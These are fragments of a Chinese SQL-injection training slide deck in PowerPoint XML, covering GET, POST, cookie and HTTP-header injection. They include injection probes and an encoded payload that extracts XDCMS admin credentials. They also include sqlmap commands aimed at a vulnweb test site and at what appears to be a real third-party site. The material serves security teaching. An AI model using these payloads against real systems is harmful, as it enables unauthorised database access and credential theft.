              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="Kozuka Gothic Pro EL" panose="020B0200000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Kozuka Gothic Pro EL" panose="020B0200000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t> XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>注入漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>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xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>实体注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>xml</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>可扩展标记语言，标准通用标记语言的子集，是一种用于标记电子文件使其具有结构性的标记语言。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在电子计算机中，标记指计算机所能理解的信息符号，通过此种标记，计算机之间可以处理包含各种的信息比如文章等。它可以用来标记数据、定义数据类型，是一种允许用户对自己的标记语言进行定义的源语言。 它非常适合万维网传输，提供统一的方法来描述和交换独立于应用程序或供应商的结构化数据。是Internet环境中跨平台的、依赖于内容的技术，也是当今处理分布式结构信息的有效工具。早在1998年，W3C就发布了XML1.0规范，使用它来简化Internet的文档信息传输。</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xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入实例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>漏洞形成原因：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>代码过滤不严</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>用户可以控制</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>漏洞实例：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>任意文件读取实例</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>用户注册注入实例</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flipV="1">
            <a:off x="1664970" y="4050665"/>
            <a:ext cx="8407400" cy="5715"/>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758950" y="2031365"/>
            <a:ext cx="8468995" cy="1905"/>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067810" y="2840355"/>
            <a:ext cx="5627370" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Kozuka Gothic Pro EL" panose="020B0200000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>PART </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:ea typeface="Kozuka Gothic Pro EL" panose="020B0200000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Kozuka Gothic Pro EL" panose="020B0200000000000000" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t> APP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>注入漏洞挖掘</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym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app</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入挖掘</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>利用抓包工具获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>app</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>发送到服务器的链接</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>burp fiddler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>即可</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>得到链接进行测试</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常见的提交方式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>GET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>POST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>COOKIE  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用来绕过通用代码防护、挖掘逻辑漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HEAD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PUT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>OPTION</a:t>
            </a:r>
          </a:p>
          <a:p>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GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>get注入比较常见</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>例如：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.cracer.com/new.asp?id=11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ssid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>=123&amp;bid=55</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>And 1=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>And 1=2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/ -0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>‘    %bf’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>加宽字节</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>主要针对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>站点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>gbk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>编码的才存在宽字节漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRP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POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>post提交方式主要适用于表单的提交</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可能存在漏洞的位置：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>搜索框、登录、留言、注册</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>挖掘的时候注入魔术引号</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>例如：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>www.cracer.com/admin.php</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>测试站点：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://testasp.vulnweb.com/login.asp?tfUPass=&amp;tfUName=</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>测试工具</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>pangolin  sqlmap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Xdcms +burp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入</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XDCMS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>全版本存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>需要使用代理抓包改包工具进行完成。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> exp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>%60%3D%28select%20group_concat%28username%2C0x3a%2Cpassword%29%20from%20c_admin%20where%20id%3D1%29%23</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>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POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入利用工具</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>pangolin</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sqlmap -u  http://testasp.vulnweb.com/login.asp --data "tfUPass=1&amp;tfUName=1" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>POST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>手工</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRP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COOKIE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>cookie提交用于账号密码的cookie缓存</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>还可以通过cookie注入来突破简单的防注入系统</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>测试站点：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://www.jnrcjt.com/onepage3.asp?id=30</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sqlmap.py -u http://www.jnrcjt.com/onepage3.asp --cookie "id=30" --level 2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="29FF8A"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>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2272</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>218</Paragraphs>
  <Slides>38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38</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="45" baseType="lpstr">
      <vt:lpstr>微软雅黑</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常见的提交方式</vt:lpstr>
      <vt:lpstr>GET注入</vt:lpstr>
      <vt:lpstr>POST注入</vt:lpstr>
      <vt:lpstr>XDCMS全版本存在sql注入漏洞</vt:lpstr>
      <vt:lpstr>POST注入利用工具</vt:lpstr>
      <vt:lpstr>COOKIE注入</vt:lpstr>
      <vt:lpstr>cookie 手工注入</vt:lpstr>
      <vt:lpstr>HTTP头注入</vt:lpstr>
      <vt:lpstr>HTTP头注入</vt:lpstr>
      <vt:lpstr>HTTP头注入</vt:lpstr>
      <vt:lpstr>HTTP头注入</vt:lpstr>
      <vt:lpstr>http 头利用</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>伪静态注入</vt:lpstr>
